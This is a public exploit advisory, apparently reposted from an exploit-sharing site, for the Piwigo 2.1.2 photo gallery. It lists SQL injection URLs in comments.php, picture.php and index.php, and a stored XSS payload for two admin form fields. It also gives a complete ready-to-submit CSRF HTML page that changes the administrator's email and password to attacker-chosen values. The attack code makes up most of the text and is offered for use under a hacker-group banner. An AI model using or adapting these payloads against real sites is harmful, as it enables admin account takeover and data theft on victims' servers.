Piwigo 2.1.2 cross site request forgery, cross site scriptingd remote SQL injection

2010.09.13
Credit: Sweet
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 Sweet the Algerian Haxxor 0 1 ###################################### 0 0 1 1 [+]Exploit Title: piwigo-2.1.2 Multiple vulnerabilities 0 0 [+]Date: 11/09/2010 1 1 [+]Author: Sweet 0 0 [+]Contact : charif38@hotmail.fr 0 1 [+]Software Link: http://fr.piwigo.org 0 0 [+]Download:http://fr.piwigo.org/releases/2.1.2 1 1 [+]Version:2.1.2 0 0 [+]Tested on: WinXp sp3 1 1 [+]Risk : Hight 0 0 [+]Description : Piwigo is a software for picture web gallerie 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 --=Sql injection=-- http://www.target.com/path/comments.php?keyword=charif38@hotmail.fr&author=sweet&cat=1[SQLi]&since=1&sort_by=date&sort_order=DESC&items_number=5 http://www.target.com/path/picture.php?1sweet[SQLi]&action=rate=0 http://www.target.com/path/index.php?/search/10[SQli] --=Stored Xss=-- Admin login required Attack pattern : >'<script>alert("Sweet")</script> http://www.target.com/path/admin.php?page=tags The POST variable "Nouveau tag" is vulnerable to a stored xss attack http://www.target.com/path/admin.php?page=cat_list The POST variable "Ajouter une catgorie virtuelle" is vulnerable to a stored xss attack --=CSRF=-- Change admin password exploit <html> <body> <h1>Piwigo-2.1.2 Change admin password CSRF </h1> <form method="POST" name="form0" action="http://www.target.com/path/admin.php?page=profile&user_id=1"> <input type="hidden" name="redirect" value="admin.php?page"/> <input type="hidden" name="mail_address" value="charif38@hotmail.fr"/> <!-- Your email here --> <input type="hidden" name="use_new_pwd" value="sweet"/> <!-- Your password here --> <input type="hidden" name="passwordConf" value="sweet"/> <!-- Your password here --> <input type="hidden" name="nb_image_line" value="5"/> <input type="hidden" name="nb_line_page" value="3"/> <input type="hidden" name="theme" value="Sylvia"/> <input type="hidden" name="language" value="fr_FR"/> <input type="hidden" name="recent_period" value="7"/> <input type="hidden" name="expand" value="false"/> <input type="hidden" name="show_nb_comments" value="false"/> <input type="hidden" name="show_nb_hits" value="false"/> <input type="hidden" name="maxwidth" value=""/> <input type="hidden" name="maxheight" value=""/> <p> Push the Button <input type="submit" name="validate" value="Valider"/> </p> </form> <form method="GET" name="form1" action="http://www.target.com/path/admin.php?page=user_list"> <input type="hidden" name="name" value="value"/> </form> </body> </html> [ thx and RIP to Milw0rm.com , JF - Hamst0r - Keystroke you always be right here 3> ] , inj3ct0r.com , exploit-db.com 1,2,3 VIVA LALGERIE


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top